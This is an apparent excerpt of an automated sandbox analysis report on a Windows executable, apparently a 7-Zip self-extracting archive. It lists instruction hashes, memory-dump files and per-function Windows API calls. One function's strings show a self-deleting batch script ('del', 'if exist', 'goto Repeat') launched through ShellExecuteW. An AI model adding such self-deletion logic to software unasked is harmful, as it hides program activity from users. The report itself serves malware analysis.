                                                    • Opcode Fuzzy Hash: b05532998844e7b030d05f987acda7d9849a42490bb64f13068762cae89e512d
                                                    • Instruction Fuzzy Hash: B4221B70D00209DFCB54DFA5C891AEEBBB5FF49304F14407EE819AB292DB349991CB99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 02236ddf882897b580785ade712133ff623eea36b25cfe5c8e0816d706c58b19
                                                    • Instruction ID: 24fa9bf714c8220c19a98afc1d6ecaddeb96014b9e166ffe1d082dc6119362ae
                                                    • Opcode Fuzzy Hash: 02236ddf882897b580785ade712133ff623eea36b25cfe5c8e0816d706c58b19
                                                    • Instruction Fuzzy Hash: 47029372F001258FDF04DF2CC5806BC7BE2BB85386F15466AE856DB684E674DAC1CB98
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction ID: abbbafb52c4abf6081ed23f1211f37930a1bb8efdbac0bee7b5df1a2fd2eee22
                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction Fuzzy Hash: BF9188732090A30ADB29463D84741BFFFE15A523A131B079FD4F2CB2C1EE28D5A5D628
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction ID: 0b36473d0712a21fdf89b137d858effbed85754ad67a9f04cd7f4fa31729b161
                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction Fuzzy Hash: 0191667220C0B349DB29463E857407EFFE19A523A131B079FD4F2CA2C5FE28D5A5D628
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction ID: 3919f0c0b4ed48f5fdfdf519e3289d93c7d44d05ebf107192a81baae38b14441
                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction Fuzzy Hash: 0C9176722090A34ADB29463D95341BFFFE25A523A131B07AFD4F2CA2C5FE18D594D628
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction ID: 00db7f54c09d4e664a4bf92c29ccc8306fbb410a0adc9c6b6dccdf960f9bfe78
                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                    • Instruction Fuzzy Hash: 348187322090A309DB29467E85740BFFFE15A513A131B079FD8F2CA2C5EE28D5A5D628
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47b6b61b08ce3bb09ad3ec551afcaaffae0c41babd603749b70cf29f27586135
                                                    • Instruction ID: a2e31cdffff1626e7d08452a7a433821ff73a9c8a6d8c3f39eaf252be9dd3ae2
                                                    • Opcode Fuzzy Hash: 47b6b61b08ce3bb09ad3ec551afcaaffae0c41babd603749b70cf29f27586135
                                                    • Instruction Fuzzy Hash: 244146327006068FDB38CD2D88902AE77E2ABC5310B18C93ED997D7B81C679D90BC754
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d674c0f84ac3acb2b9102cbad2f79c786f2052c1b9f45c1f7008a0fde2fa4379
                                                    • Instruction ID: 677ed473426cf704e373d8e1267a7361b0a7c1101c1b60bf36363dd32c9be67b
                                                    • Opcode Fuzzy Hash: d674c0f84ac3acb2b9102cbad2f79c786f2052c1b9f45c1f7008a0fde2fa4379
                                                    • Instruction Fuzzy Hash: 2C41B4A1C14F9652E7134F3CC842272B320BFAF208F10D76AFDD179963EB3265456655
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73dd1a86799d80143cbbdbaeda274d707130190cc5d70280a0d1a6d18b079393
                                                    • Instruction ID: 538e2535fe5236040a793564842bbb27ccd2f55bc3446ca11cf4f57ac25525bf
                                                    • Opcode Fuzzy Hash: 73dd1a86799d80143cbbdbaeda274d707130190cc5d70280a0d1a6d18b079393
                                                    • Instruction Fuzzy Hash: AA21C8329006255BC702DE6EE4845A7F392FBC432AF574727ED8463290C738B854C6D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ea83334c1e98586e875d0820215f4ccb4d4763d89a5a125069a5872052cfc15
                                                    • Instruction ID: 9d1bbcbc2298e9365e84d9c336a4d420a1c96383be17cd375720e82858c43ccf
                                                    • Opcode Fuzzy Hash: 1ea83334c1e98586e875d0820215f4ccb4d4763d89a5a125069a5872052cfc15
                                                    • Instruction Fuzzy Hash: E02107725104259BC702DF1DE4886B7B3E1FFE8319F578A2BD98187280C728E845D6E5
                                                    APIs
                                                    • lstrcmpiW.KERNEL32(00000000,0041D424), ref: 0040497F
                                                    • _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 00404A6B
                                                    • _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 00404A85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _wtol$lstrcmpi
                                                    • String ID: X_$CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title
                                                    • API String ID: 2897064186-2034584860
                                                    • Opcode ID: ac5839555febace94c4951e1d5288340f9c3ac755999470eb86307af12c43a60
                                                    • Instruction ID: 1e4182120db62a9ca66f94633a58cadc7bff0e04447debb8327e4c204bd28926
                                                    • Opcode Fuzzy Hash: ac5839555febace94c4951e1d5288340f9c3ac755999470eb86307af12c43a60
                                                    • Instruction Fuzzy Hash: A55188B1B50314BEEB14AF75AC829BA37DCDA90759750047FF802E32E1EA3C9E414A5C
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000065), ref: 004061F0
                                                    • LoadIconW.USER32(00000000), ref: 004061F7
                                                    • GetSystemMetrics.USER32(00000032), ref: 00406209
                                                    • GetSystemMetrics.USER32(00000031), ref: 0040620E
                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00406217
                                                    • LoadImageW.USER32(00000000), ref: 0040621E
                                                    • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0040623C
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00406249
                                                      • Part of subcall function 00406CD5: GetDlgItem.USER32(?,?), ref: 00406CE1
                                                      • Part of subcall function 00406CD5: GetWindowTextLengthW.USER32(00000000), ref: 00406CE8
                                                      • Part of subcall function 00406CD5: GetDlgItem.USER32(?,?), ref: 00406CFB
                                                      • Part of subcall function 0040744D: GetDlgItem.USER32(?,?), ref: 0040745C
                                                      • Part of subcall function 0040744D: ShowWindow.USER32(00000000,?,?,0040645A,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00407474
                                                      • Part of subcall function 00406EA2: GetDlgItem.USER32(?,000004B3), ref: 00406EB8
                                                      • Part of subcall function 00406EA2: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00406ECA
                                                      • Part of subcall function 00406EA2: GetDlgItem.USER32(?,000004B4), ref: 00406ED4
                                                      • Part of subcall function 00406EA2: SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00406EE0
                                                      • Part of subcall function 00406EA2: SendMessageW.USER32(?,00000401,?,00000000), ref: 00406EEF
                                                      • Part of subcall function 00406EA2: GetDlgItem.USER32(?,?), ref: 00406EF7
                                                      • Part of subcall function 00406EA2: SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00406F03
                                                      • Part of subcall function 00406EA2: GetDlgItem.USER32(?,?), ref: 00406F0B
                                                      • Part of subcall function 00406EA2: SetFocus.USER32(00000000,?,?,00406351,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00406F0E
                                                      • Part of subcall function 00403C7A: SetWindowTextW.USER32(?,?), ref: 00403CDB
                                                    • GetDlgItem.USER32(?,000004B2), ref: 00406265
                                                    • GetDlgItem.USER32(?,000004B2), ref: 00406271
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00406278
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040628D
                                                    • GetDlgItem.USER32(?,000004B5), ref: 0040629A
                                                    • GetDlgItem.USER32(?,000004B5), ref: 004062AA
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004062B5
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004062C4
                                                    • GetDlgItem.USER32(?,000004B2), ref: 004062DA
                                                    • GetWindow.USER32(?,00000005), ref: 004063BF
                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00406417
                                                    • LoadIconW.USER32(00000000), ref: 0040641E
                                                    • GetDlgItem.USER32(?,000004B1), ref: 0040643D
                                                    • SendMessageW.USER32(00000000), ref: 00406440
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Item$Window$MessageSend$Long$HandleLoadModule$IconMetricsSystemText$FocusImageLengthShow
                                                    • String ID:
                                                    • API String ID: 3785092128-0
                                                    • Opcode ID: d5e754e4d832721f135e77653f759062296c8a889b20557d9a6ddaaf3763c7c2
                                                    • Instruction ID: d7e90aafd0e757e10d18d202e7566f7fcdfea5f1456dc0a3d86f09484e5ac7e1
                                                    • Opcode Fuzzy Hash: d5e754e4d832721f135e77653f759062296c8a889b20557d9a6ddaaf3763c7c2
                                                    • Instruction Fuzzy Hash: E571F9717843006BFB246F65DD8AF6A3659EB44714F15413AFA03BE2E2CABCDC108A5D
                                                    APIs
                                                    • GetDlgItem.USER32(?,000004B3), ref: 004067E8
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004067F1
                                                    • GetDlgItem.USER32(?,000004B4), ref: 00406834
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040683D
                                                    • GetSystemMetrics.USER32(00000010), ref: 004068C6
                                                    • GetSystemMetrics.USER32(00000011), ref: 004068CC
                                                    • GetSystemMetrics.USER32(00000008), ref: 004068D2
                                                    • GetSystemMetrics.USER32(00000007), ref: 004068DD
                                                    • GetParent.USER32(?), ref: 00406902
                                                    • GetClientRect.USER32(00000000,?), ref: 00406913
                                                    • ClientToScreen.USER32(00000000,?), ref: 00406924
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0040698F
                                                    • GetDlgItem.USER32(?,000004B1), ref: 004069AC
                                                    • SetWindowPos.USER32(00000000), ref: 004069B3
                                                    • GetClientRect.USER32(?,?), ref: 00406A20
                                                      • Part of subcall function 00406F7A: GetDlgItem.USER32(?,00000020), ref: 00406F98
                                                      • Part of subcall function 00406F7A: SetWindowPos.USER32(00000000,?,00406CCF,?,?,?,?,?,00000000,?,?,75A88FB0,?,?,?,00000020), ref: 00406F9F
                                                    • ClientToScreen.USER32(00000000,?), ref: 0040692B
                                                      • Part of subcall function 00405F99: GetDlgItem.USER32(?,?), ref: 00405FA5
                                                    • GetSystemMetrics.USER32(00000008), ref: 00406AAD
                                                    • GetSystemMetrics.USER32(00000007), ref: 00406AB4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$ItemWindow$Client$LongRectScreen$Parent
                                                    • String ID:
                                                    • API String ID: 2671006076-0
                                                    • Opcode ID: 03cb1b5039f6c3603e8792d352c54f19f8d0babde2965606c7c46eb8facf6461
                                                    • Instruction ID: 4ccc2a13dd396f9129f756b70f24ae64c84b461514b1d33740f959704c9e3596
                                                    • Opcode Fuzzy Hash: 03cb1b5039f6c3603e8792d352c54f19f8d0babde2965606c7c46eb8facf6461
                                                    • Instruction Fuzzy Hash: 0FA18272E402159FDF10DFA8CD85AAE7BB9EF48710F16416AE901F72C5C678ED018BA4
                                                    APIs
                                                      • Part of subcall function 0040744D: GetDlgItem.USER32(?,?), ref: 0040745C
                                                      • Part of subcall function 0040744D: ShowWindow.USER32(00000000,?,?,0040645A,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00407474
                                                    • GetDlgItem.USER32(?,000004B8), ref: 00406530
                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040653F
                                                    • GetDlgItem.USER32(?,000004B4), ref: 00406569
                                                      • Part of subcall function 00407164: SetWindowTextW.USER32(&Y@,?), ref: 0040716D
                                                    • GetDlgItem.USER32(?,000004B5), ref: 00406591
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00406596
                                                    • GetDlgItem.USER32(?,000004B5), ref: 004065A9
                                                    • SetWindowLongW.USER32(00000000), ref: 004065AC
                                                    • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004065D4
                                                    • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 004065E5
                                                    • GetDlgItem.USER32(?,000004B4), ref: 004065F3
                                                    • SetFocus.USER32(00000000), ref: 004065F6
                                                    • GetDlgItem.USER32(?,00000002), ref: 00406609
                                                    • IsWindow.USER32(00000000), ref: 0040660C
                                                    • GetDlgItem.USER32(?,00000002), ref: 0040661D
                                                    • EnableWindow.USER32(00000000), ref: 00406620
                                                    • GetDlgItem.USER32(?,000004B5), ref: 00406639
                                                    • ShowWindow.USER32(00000000), ref: 0040663C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Item$Window$EnableLongMenuShow$FocusMessageSendSystemText
                                                    • String ID:
                                                    • API String ID: 2952050823-0
                                                    • Opcode ID: 57d4f3c6cdc8830319e29171d8d729de1a7fb58ecde79828c7af3eacae6baeb4
                                                    • Instruction ID: ed6bb61e75e4487655d7e3183e4994f63aacad4e0369b63f0d81d159f6d7a285
                                                    • Opcode Fuzzy Hash: 57d4f3c6cdc8830319e29171d8d729de1a7fb58ecde79828c7af3eacae6baeb4
                                                    • Instruction Fuzzy Hash: A9318570B807447BEA216B61ED4AF1B7AADEF84B14F018539F602B61F1CB7898508A5C
                                                    APIs
                                                    • GetDriveTypeW.KERNEL32(?), ref: 004042F5
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404328
                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004043DA
                                                    • CloseHandle.KERNEL32(00000000), ref: 004043EC
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00404402
                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404414
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                    • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                    • API String ID: 3376544914-3467708659
                                                    • Opcode ID: 4f415fd3ce4630a77a2767b630249be4faa78802f12aca1b91d4192a9d5e3af2
                                                    • Instruction ID: cfc01dc45848d0242061778131bcc67b824a7b99476293ec523e887c5eca1a00
                                                    • Opcode Fuzzy Hash: 4f415fd3ce4630a77a2767b630249be4faa78802f12aca1b91d4192a9d5e3af2
                                                    • Instruction Fuzzy Hash: E6418571900108BECB04EBA1DC86EEE7B78EF14314F50442BF601760D1EB756E95C759
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: e6c778c2375fa9186e5775a0fab15f2671213df02f5f1248b7536423324b6cd6
                                                    • Instruction ID: 7f1a2b47ee085a34698ba4ac4c6dccb7e3e6f3a5c157eb67d943d60c885a0922
                                                    • Opcode Fuzzy Hash: e6c778c2375fa9186e5775a0fab15f2671213df02f5f1248b7536423324b6cd6
                                                    • Instruction Fuzzy Hash: D24140B1D4061AFBDB106A51DC41FE737AC9E61398B144436FC16BB281E33CEE4986D9
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00405960
                                                    • GetWindowLongW.USER32(00000000), ref: 00405967
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040597E
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 004059A3
                                                    • GetSystemMetrics.USER32(00000031), ref: 004059B4
                                                    • GetSystemMetrics.USER32(00000032), ref: 004059BB
                                                    • GetWindowDC.USER32(?), ref: 004059CC
                                                    • GetWindowRect.USER32(?,?), ref: 004059D9
                                                    • DrawIconEx.USER32(00000000,?,?,?,?,?,?,?,00000003), ref: 00405A0E
                                                    • ReleaseDC.USER32(?,00000000), ref: 00405A16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                    • String ID:
                                                    • API String ID: 2586545124-0
                                                    • Opcode ID: dba0111c73405d8b6fdb3e741527c2f9d0d1760ce5ed60bcaf958e4deb923740
                                                    • Instruction ID: b57515cd6bc49762bf2b78f9d28378ed93f25730ac5889bcbf98432be851fb3e
                                                    • Opcode Fuzzy Hash: dba0111c73405d8b6fdb3e741527c2f9d0d1760ce5ed60bcaf958e4deb923740
                                                    • Instruction Fuzzy Hash: 63310776580109BFCB019FA8ED88DEF7B79FB49310B008265F905A62A1C738DA119F65
                                                    APIs
                                                    • GetDlgItem.USER32(?,000004B3), ref: 00406EB8
                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00406ECA
                                                    • GetDlgItem.USER32(?,000004B4), ref: 00406ED4
                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00406EE0
                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00406EEF
                                                    • GetDlgItem.USER32(?,?), ref: 00406EF7
                                                    • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00406F03
                                                    • GetDlgItem.USER32(?,?), ref: 00406F0B
                                                    • SetFocus.USER32(00000000,?,?,00406351,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00406F0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
